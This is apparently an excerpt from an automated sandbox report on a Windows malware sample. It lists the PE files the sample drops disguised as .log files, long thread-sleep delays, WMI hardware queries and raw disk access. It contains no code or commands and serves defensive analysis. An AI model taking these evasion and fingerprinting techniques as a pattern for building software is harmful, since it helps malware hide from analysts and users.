                          Source: C:\Users\user\Desktop\zZ1Y43bxxV.exeDropped PE file which has not been started: C:\Users\user\Desktop\NkpshHmC.logJump to dropped file
                          Source: C:\Program Files (x86)\Windows Sidebar\Gadgets\wnWNWNYIxJtFiUSDRXunzX.exeDropped PE file which has not been started: C:\Users\user\Desktop\jUEFnHBb.logJump to dropped file
                          Source: C:\Users\user\Desktop\zZ1Y43bxxV.exeDropped PE file which has not been started: C:\Users\user\Desktop\CzktcvcZ.logJump to dropped file
                          Source: C:\Users\user\Desktop\zZ1Y43bxxV.exeDropped PE file which has not been started: C:\Users\user\Desktop\aEoYYxCd.logJump to dropped file
                          Source: C:\Program Files (x86)\Windows Sidebar\Gadgets\wnWNWNYIxJtFiUSDRXunzX.exeDropped PE file which has not been started: C:\Users\user\Desktop\EfGUsIxp.logJump to dropped file
                          Source: C:\Program Files (x86)\Windows Sidebar\Gadgets\wnWNWNYIxJtFiUSDRXunzX.exeDropped PE file which has not been started: C:\Users\user\Desktop\cNtGaFop.logJump to dropped file
                          Source: C:\Program Files (x86)\Windows Sidebar\Gadgets\wnWNWNYIxJtFiUSDRXunzX.exeDropped PE file which has not been started: C:\Users\user\Desktop\eYPHaYTq.logJump to dropped file
                          Source: C:\Users\user\Desktop\zZ1Y43bxxV.exeDropped PE file which has not been started: C:\Users\user\Desktop\vYOmNlRn.logJump to dropped file
                          Source: C:\Users\user\Desktop\zZ1Y43bxxV.exeDropped PE file which has not been started: C:\Users\user\Desktop\FpakjsdS.logJump to dropped file
                          Source: C:\Program Files (x86)\Windows Sidebar\Gadgets\wnWNWNYIxJtFiUSDRXunzX.exeDropped PE file which has not been started: C:\Users\user\Desktop\iGWfDlte.logJump to dropped file
                          Source: C:\Program Files (x86)\Windows Sidebar\Gadgets\wnWNWNYIxJtFiUSDRXunzX.exeDropped PE file which has not been started: C:\Users\user\Desktop\NAfrxSmR.logJump to dropped file
                          Source: C:\Program Files (x86)\Windows Sidebar\Gadgets\wnWNWNYIxJtFiUSDRXunzX.exeDropped PE file which has not been started: C:\Users\user\Desktop\urceIxCH.logJump to dropped file
                          Source: C:\Users\user\Desktop\zZ1Y43bxxV.exeDropped PE file which has not been started: C:\Users\user\Desktop\rLFDskhr.logJump to dropped file
                          Source: C:\Users\user\Desktop\zZ1Y43bxxV.exeDropped PE file which has not been started: C:\Users\user\Desktop\nUbffkpH.logJump to dropped file
                          Source: C:\Program Files (x86)\Windows Sidebar\Gadgets\wnWNWNYIxJtFiUSDRXunzX.exeDropped PE file which has not been started: C:\Users\user\Desktop\UhMZMMnD.logJump to dropped file
                          Source: C:\Users\user\Desktop\zZ1Y43bxxV.exeDropped PE file which has not been started: C:\Users\user\Desktop\lJFefRJG.logJump to dropped file
                          Source: C:\Users\user\Desktop\zZ1Y43bxxV.exeDropped PE file which has not been started: C:\Users\user\Desktop\QVVIoUxv.logJump to dropped file
                          Source: C:\Program Files (x86)\Windows Sidebar\Gadgets\wnWNWNYIxJtFiUSDRXunzX.exeDropped PE file which has not been started: C:\Users\user\Desktop\ymdvPcsA.logJump to dropped file
                          Source: C:\Users\user\Desktop\zZ1Y43bxxV.exeDropped PE file which has not been started: C:\Users\user\Desktop\fijXRHyU.logJump to dropped file
                          Source: C:\Users\user\Desktop\zZ1Y43bxxV.exeDropped PE file which has not been started: C:\Users\user\Desktop\mpuXdJMF.logJump to dropped file
                          Source: C:\Users\user\Desktop\zZ1Y43bxxV.exeDropped PE file which has not been started: C:\Users\user\Desktop\kdkoYnoN.logJump to dropped file
                          Source: C:\Users\user\Desktop\zZ1Y43bxxV.exeDropped PE file which has not been started: C:\Users\user\Desktop\CqMurJJc.logJump to dropped file
                          Source: C:\Program Files (x86)\Windows Sidebar\Gadgets\wnWNWNYIxJtFiUSDRXunzX.exeDropped PE file which has not been started: C:\Users\user\Desktop\HQmkzWIi.logJump to dropped file
                          Source: C:\Users\user\Desktop\zZ1Y43bxxV.exeDropped PE file which has not been started: C:\Users\user\Desktop\xuLckdTj.logJump to dropped file
                          Source: C:\Program Files (x86)\Windows Sidebar\Gadgets\wnWNWNYIxJtFiUSDRXunzX.exeDropped PE file which has not been started: C:\Users\user\Desktop\bfAYobhs.logJump to dropped file
                          Source: C:\Program Files (x86)\Windows Sidebar\Gadgets\wnWNWNYIxJtFiUSDRXunzX.exeDropped PE file which has not been started: C:\Users\user\Desktop\voDmexRC.logJump to dropped file
                          Source: C:\Users\user\Desktop\zZ1Y43bxxV.exeDropped PE file which has not been started: C:\Users\user\Desktop\IaGAqGnL.logJump to dropped file
                          Source: C:\Users\user\Desktop\zZ1Y43bxxV.exeDropped PE file which has not been started: C:\Users\user\Desktop\wGHUzQXl.logJump to dropped file
                          Source: C:\Program Files (x86)\Windows Sidebar\Gadgets\wnWNWNYIxJtFiUSDRXunzX.exeDropped PE file which has not been started: C:\Users\user\Desktop\YoKhhehz.logJump to dropped file
                          Source: C:\Program Files (x86)\Windows Sidebar\Gadgets\wnWNWNYIxJtFiUSDRXunzX.exeDropped PE file which has not been started: C:\Users\user\Desktop\LGcbGTIb.logJump to dropped file
                          Source: C:\Program Files (x86)\Windows Sidebar\Gadgets\wnWNWNYIxJtFiUSDRXunzX.exeDropped PE file which has not been started: C:\Users\user\Desktop\JKpAqWmX.logJump to dropped file
                          Source: C:\Users\user\Desktop\zZ1Y43bxxV.exeDropped PE file which has not been started: C:\Users\user\Desktop\jeYWdqhF.logJump to dropped file
                          Source: C:\Users\user\Desktop\zZ1Y43bxxV.exe TID: 6384Thread sleep time: -922337203685477s >= -30000sJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7224Thread sleep count: 2411 > 30Jump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7504Thread sleep time: -1844674407370954s >= -30000sJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7428Thread sleep time: -922337203685477s >= -30000sJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7196Thread sleep count: 3636 > 30Jump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7508Thread sleep time: -922337203685477s >= -30000sJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7416Thread sleep time: -922337203685477s >= -30000sJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7200Thread sleep count: 3196 > 30Jump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7516Thread sleep time: -1844674407370954s >= -30000sJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 2140Thread sleep count: 127 > 30Jump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7412Thread sleep time: -922337203685477s >= -30000sJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7244Thread sleep count: 3780 > 30Jump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7500Thread sleep time: -15679732462653109s >= -30000sJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7248Thread sleep count: 280 > 30Jump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 6912Thread sleep time: -922337203685477s >= -30000sJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7236Thread sleep count: 3174 > 30
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7512Thread sleep time: -922337203685477s >= -30000s
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7584Thread sleep count: 217 > 30
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7396Thread sleep time: -922337203685477s >= -30000s
                          Source: C:\Program Files (x86)\Windows Sidebar\Gadgets\wnWNWNYIxJtFiUSDRXunzX.exe TID: 7748Thread sleep time: -30000s >= -30000s
                          Source: C:\Program Files (x86)\Windows Sidebar\Gadgets\wnWNWNYIxJtFiUSDRXunzX.exe TID: 8100Thread sleep time: -24903104499507879s >= -30000s
                          Source: C:\Program Files (x86)\Windows Sidebar\Gadgets\wnWNWNYIxJtFiUSDRXunzX.exe TID: 8100Thread sleep time: -600000s >= -30000s
                          Source: C:\Program Files (x86)\Windows Sidebar\Gadgets\wnWNWNYIxJtFiUSDRXunzX.exe TID: 8100Thread sleep time: -599861s >= -30000s
                          Source: C:\Program Files (x86)\Windows Sidebar\Gadgets\wnWNWNYIxJtFiUSDRXunzX.exe TID: 8100Thread sleep time: -599734s >= -30000s
                          Source: C:\Program Files (x86)\Windows Sidebar\Gadgets\wnWNWNYIxJtFiUSDRXunzX.exe TID: 8100Thread sleep time: -599614s >= -30000s
                          Source: C:\Program Files (x86)\Windows Sidebar\Gadgets\wnWNWNYIxJtFiUSDRXunzX.exe TID: 8100Thread sleep time: -599484s >= -30000s
                          Source: C:\Program Files (x86)\Windows Sidebar\Gadgets\wnWNWNYIxJtFiUSDRXunzX.exe TID: 8100Thread sleep time: -599374s >= -30000s
                          Source: C:\Program Files (x86)\Windows Sidebar\Gadgets\wnWNWNYIxJtFiUSDRXunzX.exe TID: 8100Thread sleep time: -599265s >= -30000s
                          Source: C:\Program Files (x86)\Windows Sidebar\Gadgets\wnWNWNYIxJtFiUSDRXunzX.exe TID: 8100Thread sleep time: -599156s >= -30000s
                          Source: C:\Program Files (x86)\Windows Sidebar\Gadgets\wnWNWNYIxJtFiUSDRXunzX.exe TID: 8084Thread sleep time: -36000000s >= -30000s
                          Source: C:\Program Files (x86)\Windows Sidebar\Gadgets\wnWNWNYIxJtFiUSDRXunzX.exe TID: 8100Thread sleep time: -598968s >= -30000s
                          Source: C:\Program Files (x86)\Windows Sidebar\Gadgets\wnWNWNYIxJtFiUSDRXunzX.exe TID: 8100Thread sleep time: -598453s >= -30000s
                          Source: C:\Program Files (x86)\Windows Sidebar\Gadgets\wnWNWNYIxJtFiUSDRXunzX.exe TID: 8100Thread sleep time: -597656s >= -30000s
                          Source: C:\Program Files (x86)\Windows Sidebar\Gadgets\wnWNWNYIxJtFiUSDRXunzX.exe TID: 8100Thread sleep time: -597250s >= -30000s
                          Source: C:\Program Files (x86)\Windows Sidebar\Gadgets\wnWNWNYIxJtFiUSDRXunzX.exe TID: 8100Thread sleep time: -596578s >= -30000s
                          Source: C:\Program Files (x86)\Windows Sidebar\Gadgets\wnWNWNYIxJtFiUSDRXunzX.exe TID: 8100Thread sleep time: -596141s >= -30000s
                          Source: C:\Program Files (x86)\Windows Sidebar\Gadgets\wnWNWNYIxJtFiUSDRXunzX.exe TID: 8100Thread sleep time: -595859s >= -30000s
                          Source: C:\Program Files (x86)\Windows Sidebar\Gadgets\wnWNWNYIxJtFiUSDRXunzX.exe TID: 8100Thread sleep time: -595406s >= -30000s
                          Source: C:\Program Files (x86)\Windows Sidebar\Gadgets\wnWNWNYIxJtFiUSDRXunzX.exe TID: 8100Thread sleep time: -595125s >= -30000s
                          Source: C:\Program Files (x86)\Windows Sidebar\Gadgets\wnWNWNYIxJtFiUSDRXunzX.exe TID: 8100Thread sleep time: -594859s >= -30000s
                          Source: C:\Program Files (x86)\Windows Sidebar\Gadgets\wnWNWNYIxJtFiUSDRXunzX.exe TID: 8100Thread sleep time: -594437s >= -30000s
                          Source: C:\Program Files (x86)\Windows Sidebar\Gadgets\wnWNWNYIxJtFiUSDRXunzX.exe TID: 8100Thread sleep time: -594125s >= -30000s
                          Source: C:\Program Files (x86)\Windows Sidebar\Gadgets\wnWNWNYIxJtFiUSDRXunzX.exe TID: 8100Thread sleep time: -593187s >= -30000s
                          Source: C:\Program Files (x86)\Windows Sidebar\Gadgets\wnWNWNYIxJtFiUSDRXunzX.exe TID: 8100Thread sleep time: -592839s >= -30000s
                          Source: C:\Program Files (x86)\Windows Sidebar\Gadgets\wnWNWNYIxJtFiUSDRXunzX.exe TID: 8100Thread sleep time: -592484s >= -30000s
                          Source: C:\Program Files (x86)\Windows Sidebar\Gadgets\wnWNWNYIxJtFiUSDRXunzX.exe TID: 8100Thread sleep time: -591969s >= -30000s
                          Source: C:\Program Files (x86)\Windows Sidebar\Gadgets\wnWNWNYIxJtFiUSDRXunzX.exe TID: 8100Thread sleep time: -591625s >= -30000s
                          Source: C:\Program Files (x86)\Windows Sidebar\Gadgets\wnWNWNYIxJtFiUSDRXunzX.exe TID: 8100Thread sleep time: -591281s >= -30000s
                          Source: C:\Program Files (x86)\Windows Sidebar\Gadgets\wnWNWNYIxJtFiUSDRXunzX.exe TID: 8100Thread sleep time: -590984s >= -30000s
                          Source: C:\Program Files (x86)\Windows Sidebar\Gadgets\wnWNWNYIxJtFiUSDRXunzX.exe TID: 8100Thread sleep time: -590641s >= -30000s
                          Source: C:\Program Files (x86)\Windows Sidebar\Gadgets\wnWNWNYIxJtFiUSDRXunzX.exe TID: 8100Thread sleep time: -590078s >= -30000s
                          Source: C:\Program Files (x86)\Windows Sidebar\Gadgets\wnWNWNYIxJtFiUSDRXunzX.exe TID: 8100Thread sleep time: -589594s >= -30000s
                          Source: C:\Program Files (x86)\Windows Sidebar\Gadgets\wnWNWNYIxJtFiUSDRXunzX.exe TID: 8100Thread sleep time: -589062s >= -30000s
                          Source: C:\Program Files (x86)\Windows Sidebar\Gadgets\wnWNWNYIxJtFiUSDRXunzX.exe TID: 8100Thread sleep time: -588547s >= -30000s
                          Source: C:\Program Files (x86)\Windows Sidebar\Gadgets\wnWNWNYIxJtFiUSDRXunzX.exe TID: 8100Thread sleep time: -588109s >= -30000s
                          Source: C:\Program Files (x86)\Windows Sidebar\Gadgets\wnWNWNYIxJtFiUSDRXunzX.exe TID: 8100Thread sleep time: -587719s >= -30000s
                          Source: C:\Program Files (x86)\Windows Sidebar\Gadgets\wnWNWNYIxJtFiUSDRXunzX.exe TID: 8100Thread sleep time: -587440s >= -30000s
                          Source: C:\Program Files (x86)\Windows Sidebar\Gadgets\wnWNWNYIxJtFiUSDRXunzX.exe TID: 8100Thread sleep time: -587025s >= -30000s
                          Source: C:\Program Files (x86)\Windows Sidebar\Gadgets\wnWNWNYIxJtFiUSDRXunzX.exe TID: 8100Thread sleep time: -586641s >= -30000s
                          Source: C:\Program Files (x86)\Windows Sidebar\Gadgets\wnWNWNYIxJtFiUSDRXunzX.exe TID: 8100Thread sleep time: -586250s >= -30000s
                          Source: C:\Program Files (x86)\Windows Sidebar\Gadgets\wnWNWNYIxJtFiUSDRXunzX.exe TID: 8100Thread sleep time: -585797s >= -30000s
                          Source: C:\Program Files (x86)\Windows Sidebar\Gadgets\wnWNWNYIxJtFiUSDRXunzX.exe TID: 8100Thread sleep time: -585295s >= -30000s
                          Source: C:\Program Files (x86)\Windows Sidebar\Gadgets\wnWNWNYIxJtFiUSDRXunzX.exe TID: 8100Thread sleep time: -585078s >= -30000s
                          Source: C:\Program Files (x86)\Windows Sidebar\Gadgets\wnWNWNYIxJtFiUSDRXunzX.exe TID: 8100Thread sleep time: -584734s >= -30000s
                          Source: C:\Program Files (x86)\Windows Sidebar\Gadgets\wnWNWNYIxJtFiUSDRXunzX.exe TID: 8100Thread sleep time: -584417s >= -30000s
                          Source: C:\Program Files (x86)\Windows Sidebar\Gadgets\wnWNWNYIxJtFiUSDRXunzX.exe TID: 8100Thread sleep time: -584147s >= -30000s
                          Source: C:\Program Files (x86)\Windows Sidebar\Gadgets\wnWNWNYIxJtFiUSDRXunzX.exe TID: 8100Thread sleep time: -583812s >= -30000s
                          Source: C:\Program Files (x86)\Windows Sidebar\Gadgets\wnWNWNYIxJtFiUSDRXunzX.exe TID: 8100Thread sleep time: -583644s >= -30000s
                          Source: C:\Program Files (x86)\Windows Sidebar\Gadgets\wnWNWNYIxJtFiUSDRXunzX.exe TID: 8100Thread sleep time: -583453s >= -30000s
                          Source: C:\Program Files (x86)\Windows Sidebar\Gadgets\wnWNWNYIxJtFiUSDRXunzX.exe TID: 8100Thread sleep time: -583287s >= -30000s
                          Source: C:\Program Files (x86)\Windows Sidebar\Gadgets\wnWNWNYIxJtFiUSDRXunzX.exe TID: 8100Thread sleep time: -583125s >= -30000s
                          Source: C:\Program Files (x86)\Windows Sidebar\Gadgets\wnWNWNYIxJtFiUSDRXunzX.exe TID: 8100Thread sleep time: -582960s >= -30000s
                          Source: C:\Program Files (x86)\Windows Sidebar\Gadgets\wnWNWNYIxJtFiUSDRXunzX.exe TID: 8100Thread sleep time: -582812s >= -30000s
                          Source: C:\Program Files (x86)\Windows Sidebar\Gadgets\wnWNWNYIxJtFiUSDRXunzX.exe TID: 8100Thread sleep time: -582578s >= -30000s
                          Source: C:\Program Files (x86)\Windows Sidebar\Gadgets\wnWNWNYIxJtFiUSDRXunzX.exe TID: 8100Thread sleep time: -582347s >= -30000s
                          Source: C:\Program Files (x86)\Windows Sidebar\Gadgets\wnWNWNYIxJtFiUSDRXunzX.exe TID: 8100Thread sleep time: -582179s >= -30000s
                          Source: C:\Program Files (x86)\Windows Sidebar\Gadgets\wnWNWNYIxJtFiUSDRXunzX.exe TID: 8100Thread sleep time: -582031s >= -30000s
                          Source: C:\Program Files (x86)\Windows Sidebar\Gadgets\wnWNWNYIxJtFiUSDRXunzX.exe TID: 8100Thread sleep time: -581859s >= -30000s
                          Source: C:\Program Files (x86)\Windows Sidebar\Gadgets\wnWNWNYIxJtFiUSDRXunzX.exe TID: 8100Thread sleep time: -581703s >= -30000s
                          Source: C:\Program Files (x86)\Windows Sidebar\Gadgets\wnWNWNYIxJtFiUSDRXunzX.exe TID: 8100Thread sleep time: -581531s >= -30000s
                          Source: C:\Program Files (x86)\Windows Sidebar\Gadgets\wnWNWNYIxJtFiUSDRXunzX.exe TID: 8100Thread sleep time: -581359s >= -30000s
                          Source: C:\Program Files (x86)\Windows Sidebar\Gadgets\wnWNWNYIxJtFiUSDRXunzX.exe TID: 8100Thread sleep time: -581187s >= -30000s
                          Source: C:\Program Files (x86)\Windows Sidebar\Gadgets\wnWNWNYIxJtFiUSDRXunzX.exe TID: 8100Thread sleep time: -581044s >= -30000s
                          Source: C:\Program Files (x86)\Windows Sidebar\Gadgets\wnWNWNYIxJtFiUSDRXunzX.exe TID: 8100Thread sleep time: -580880s >= -30000s
                          Source: C:\Program Files (x86)\Windows Sidebar\Gadgets\wnWNWNYIxJtFiUSDRXunzX.exe TID: 8100Thread sleep time: -580703s >= -30000s
                          Source: C:\Program Files (x86)\Windows Sidebar\Gadgets\wnWNWNYIxJtFiUSDRXunzX.exe TID: 8100Thread sleep time: -580516s >= -30000s
                          Source: C:\Program Files (x86)\Windows Sidebar\Gadgets\wnWNWNYIxJtFiUSDRXunzX.exe TID: 8100Thread sleep time: -580347s >= -30000s
                          Source: C:\Program Files (x86)\Windows Sidebar\Gadgets\wnWNWNYIxJtFiUSDRXunzX.exe TID: 8100Thread sleep time: -580141s >= -30000s
                          Source: C:\Program Files (x86)\Windows Sidebar\Gadgets\wnWNWNYIxJtFiUSDRXunzX.exe TID: 8100Thread sleep time: -579994s >= -30000s
                          Source: C:\Program Files (x86)\Windows Sidebar\Gadgets\wnWNWNYIxJtFiUSDRXunzX.exe TID: 8100Thread sleep time: -579883s >= -30000s
                          Source: C:\Program Files (x86)\Windows Sidebar\Gadgets\wnWNWNYIxJtFiUSDRXunzX.exe TID: 8100Thread sleep time: -579766s >= -30000s
                          Source: C:\Program Files (x86)\Windows Sidebar\Gadgets\wnWNWNYIxJtFiUSDRXunzX.exe TID: 8100Thread sleep time: -579656s >= -30000s
                          Source: C:\Program Files (x86)\Windows Sidebar\Gadgets\wnWNWNYIxJtFiUSDRXunzX.exe TID: 8100Thread sleep time: -579546s >= -30000s
                          Source: C:\Program Files (x86)\Windows Sidebar\Gadgets\wnWNWNYIxJtFiUSDRXunzX.exe TID: 8100Thread sleep time: -579425s >= -30000s
                          Source: C:\Program Files (x86)\Windows Sidebar\Gadgets\wnWNWNYIxJtFiUSDRXunzX.exe TID: 8100Thread sleep time: -579285s >= -30000s
                          Source: C:\Program Files (x86)\Windows Sidebar\Gadgets\wnWNWNYIxJtFiUSDRXunzX.exe TID: 8100Thread sleep time: -579156s >= -30000s
                          Source: C:\Program Files (x86)\Windows Sidebar\Gadgets\wnWNWNYIxJtFiUSDRXunzX.exe TID: 8100Thread sleep time: -579046s >= -30000s
                          Source: C:\Program Files (x86)\Windows Sidebar\Gadgets\wnWNWNYIxJtFiUSDRXunzX.exe TID: 8100Thread sleep time: -578937s >= -30000s
                          Source: C:\Program Files (x86)\Windows Sidebar\Gadgets\wnWNWNYIxJtFiUSDRXunzX.exe TID: 8100Thread sleep time: -578817s >= -30000s
                          Source: C:\Program Files (x86)\Windows Sidebar\Gadgets\wnWNWNYIxJtFiUSDRXunzX.exe TID: 8100Thread sleep time: -578672s >= -30000s
                          Source: C:\Program Files (x86)\Windows Sidebar\Gadgets\wnWNWNYIxJtFiUSDRXunzX.exe TID: 8100Thread sleep time: -578217s >= -30000s
                          Source: C:\Program Files (x86)\Windows Sidebar\Gadgets\wnWNWNYIxJtFiUSDRXunzX.exe TID: 8100Thread sleep time: -578037s >= -30000s
                          Source: C:\Program Files (x86)\Windows Sidebar\Gadgets\wnWNWNYIxJtFiUSDRXunzX.exe TID: 8100Thread sleep time: -577909s >= -30000s
                          Source: C:\Program Files (x86)\Windows Sidebar\Gadgets\wnWNWNYIxJtFiUSDRXunzX.exe TID: 8100Thread sleep time: -577753s >= -30000s
                          Source: C:\Program Files (x86)\Windows Sidebar\Gadgets\wnWNWNYIxJtFiUSDRXunzX.exe TID: 8100Thread sleep time: -577625s >= -30000s
                          Source: C:\Program Files (x86)\Windows Sidebar\Gadgets\wnWNWNYIxJtFiUSDRXunzX.exe TID: 8100Thread sleep time: -577514s >= -30000s
                          Source: C:\Program Files (x86)\Windows Sidebar\Gadgets\wnWNWNYIxJtFiUSDRXunzX.exe TID: 8100Thread sleep time: -577405s >= -30000s
                          Source: C:\Program Files (x86)\Windows Sidebar\Gadgets\wnWNWNYIxJtFiUSDRXunzX.exe TID: 8100Thread sleep time: -577281s >= -30000s
                          Source: C:\Program Files (x86)\Windows Sidebar\Gadgets\wnWNWNYIxJtFiUSDRXunzX.exe TID: 8100Thread sleep time: -577166s >= -30000s
                          Source: C:\Program Files (x86)\Windows Sidebar\Gadgets\wnWNWNYIxJtFiUSDRXunzX.exe TID: 8100Thread sleep time: -577062s >= -30000s
                          Source: C:\Program Files (x86)\Windows Sidebar\Gadgets\wnWNWNYIxJtFiUSDRXunzX.exe TID: 8100Thread sleep time: -576953s >= -30000s
                          Source: C:\Program Files (x86)\Windows Sidebar\Gadgets\wnWNWNYIxJtFiUSDRXunzX.exe TID: 8100Thread sleep time: -576843s >= -30000s
                          Source: C:\Program Files (x86)\Windows Sidebar\Gadgets\wnWNWNYIxJtFiUSDRXunzX.exe TID: 8100Thread sleep time: -576734s >= -30000s
                          Source: C:\Program Files (x86)\Windows Sidebar\Gadgets\wnWNWNYIxJtFiUSDRXunzX.exe TID: 8100Thread sleep time: -576593s >= -30000s
                          Source: C:\Program Files (x86)\Windows Sidebar\Gadgets\wnWNWNYIxJtFiUSDRXunzX.exe TID: 8100Thread sleep time: -576483s >= -30000s
                          Source: C:\Program Files (x86)\Windows Sidebar\Gadgets\wnWNWNYIxJtFiUSDRXunzX.exe TID: 8100Thread sleep time: -576375s >= -30000s
                          Source: C:\Windows\System32\svchost.exe TID: 7376Thread sleep time: -30000s >= -30000s
                          Source: C:\Windows\System32\svchost.exeFile opened: PhysicalDrive0
                          Source: C:\Program Files (x86)\Windows Sidebar\Gadgets\wnWNWNYIxJtFiUSDRXunzX.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_BaseBoard
                          Source: C:\Program Files (x86)\Windows Sidebar\Gadgets\wnWNWNYIxJtFiUSDRXunzX.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_BIOS
                          Source: C:\Program Files (x86)\Windows Sidebar\Gadgets\wnWNWNYIxJtFiUSDRXunzX.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_ComputerSystem
                          Source: C:\Program Files (x86)\Windows Sidebar\Gadgets\wnWNWNYIxJtFiUSDRXunzX.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_Processor
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeLast function: Thread delayed
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeLast function: Thread delayed
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeLast function: Thread delayed
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeLast function: Thread delayed
                          Source: C:\Windows\System32\PING.EXELast function: Thread delayed
                          Source: C:\Users\user\Desktop\zZ1Y43bxxV.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
                          Source: C:\Program Files (x86)\Windows Sidebar\Gadgets\wnWNWNYIxJtFiUSDRXunzX.exeFile Volume queried: C:\ FullSizeInformation
                          Source: C:\Users\user\Desktop\zZ1Y43bxxV.exeCode function: 0_2_00007FFD9B8BEC5A GetSystemInfo,0_2_00007FFD9B8BEC5A
                          Source: C:\Users\user\Desktop\zZ1Y43bxxV.exeThread delayed: delay time: 922337203685477Jump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                          Source: C:\Program Files (x86)\Windows Sidebar\Gadgets\wnWNWNYIxJtFiUSDRXunzX.exeThread delayed: delay time: 30000
                          Source: C:\Program Files (x86)\Windows Sidebar\Gadgets\wnWNWNYIxJtFiUSDRXunzX.exeThread delayed: delay time: 922337203685477
                          Source: C:\Program Files (x86)\Windows Sidebar\Gadgets\wnWNWNYIxJtFiUSDRXunzX.exeThread delayed: delay time: 600000
                          Source: C:\Program Files (x86)\Windows Sidebar\Gadgets\wnWNWNYIxJtFiUSDRXunzX.exeThread delayed: delay time: 599861
                          Source: C:\Program Files (x86)\Windows Sidebar\Gadgets\wnWNWNYIxJtFiUSDRXunzX.exeThread delayed: delay time: 599734
                          Source: C:\Program Files (x86)\Windows Sidebar\Gadgets\wnWNWNYIxJtFiUSDRXunzX.exeThread delayed: delay time: 599614
                          Source: C:\Program Files (x86)\Windows Sidebar\Gadgets\wnWNWNYIxJtFiUSDRXunzX.exeThread delayed: delay time: 599484
                          Source: C:\Program Files (x86)\Windows Sidebar\Gadgets\wnWNWNYIxJtFiUSDRXunzX.exeThread delayed: delay time: 599374
                          Source: C:\Program Files (x86)\Windows Sidebar\Gadgets\wnWNWNYIxJtFiUSDRXunzX.exeThread delayed: delay time: 599265
                          Source: C:\Program Files (x86)\Windows Sidebar\Gadgets\wnWNWNYIxJtFiUSDRXunzX.exeThread delayed: delay time: 599156
                          Source: C:\Program Files (x86)\Windows Sidebar\Gadgets\wnWNWNYIxJtFiUSDRXunzX.exeThread delayed: delay time: 3600000
                          Source: C:\Program Files (x86)\Windows Sidebar\Gadgets\wnWNWNYIxJtFiUSDRXunzX.exeThread delayed: delay time: 598968
                          Source: C:\Program Files (x86)\Windows Sidebar\Gadgets\wnWNWNYIxJtFiUSDRXunzX.exeThread delayed: delay time: 598453
                          Source: C:\Program Files (x86)\Windows Sidebar\Gadgets\wnWNWNYIxJtFiUSDRXunzX.exeThread delayed: delay time: 597656
                          Source: C:\Program Files (x86)\Windows Sidebar\Gadgets\wnWNWNYIxJtFiUSDRXunzX.exeThread delayed: delay time: 597250
                          Source: C:\Program Files (x86)\Windows Sidebar\Gadgets\wnWNWNYIxJtFiUSDRXunzX.exeThread delayed: delay time: 596578
                          Source: C:\Program Files (x86)\Windows Sidebar\Gadgets\wnWNWNYIxJtFiUSDRXunzX.exeThread delayed: delay time: 596141
                          Source: C:\Program Files (x86)\Windows Sidebar\Gadgets\wnWNWNYIxJtFiUSDRXunzX.exeThread delayed: delay time: 595859
                          Source: C:\Program Files (x86)\Windows Sidebar\Gadgets\wnWNWNYIxJtFiUSDRXunzX.exeThread delayed: delay time: 595406
                          Source: C:\Program Files (x86)\Windows Sidebar\Gadgets\wnWNWNYIxJtFiUSDRXunzX.exeThread delayed: delay time: 595125
                          Source: C:\Program Files (x86)\Windows Sidebar\Gadgets\wnWNWNYIxJtFiUSDRXunzX.exeThread delayed: delay time: 594859
                          Source: C:\Program Files (x86)\Windows Sidebar\Gadgets\wnWNWNYIxJtFiUSDRXunzX.exeThread delayed: delay time: 594437
